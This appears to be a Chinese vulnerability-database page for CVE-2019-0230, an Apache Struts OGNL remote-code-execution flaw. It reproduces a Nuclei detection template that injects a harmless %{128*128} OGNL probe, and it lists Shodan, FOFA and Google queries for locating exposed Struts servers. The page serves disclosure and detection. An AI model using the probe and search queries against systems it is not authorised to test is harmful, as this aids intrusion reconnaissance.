CVE-2019-0230: Apache Struts <=2.5.20 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Apache Struts | POC: 已公开

漏洞描述

Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.

PoC代码[已公开]

id: CVE-2019-0230

info:
  name: Apache Struts <=2.5.20 - Remote Code Execution
  author: geeknik
  severity: critical
  description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.
  remediation: |
    Upgrade Apache Struts to a version higher than 2.5.20 or apply the necessary patches provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-0230
    - https://cwiki.apache.org/confluence/display/WW/S2-059
    - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability
    - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html
    - https://cwiki.apache.org/confluence/display/ww/s2-059
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-0230
    cwe-id: CWE-1321
    epss-score: 0.93837
    epss-percentile: 0.99862
    cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - http.html:"apache struts"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
    fofa-query:
      - body="struts problem report"
      - title="struts2 showcase"
      - body="apache struts"
    google-query: intitle:"struts2 showcase"
  tags: cve,cve2019,tenable,packetstorm,struts,rce,apache
variables:
  str: "{{rand_base(6)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/?id={{str}}%25{128*128}"

    matchers:
      - type: word
        part: body
        words:
          - "{{str}}16384"
# digest: 490a00463044022036a613d2e19b7c97800ccfb6566d1c64a2b9f11ed3541f0feea3620ea9c79a1702204d4b369f1b803b8813d44757bb6d71601c58e5b5af493fda1cef8f9de27e4ffb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐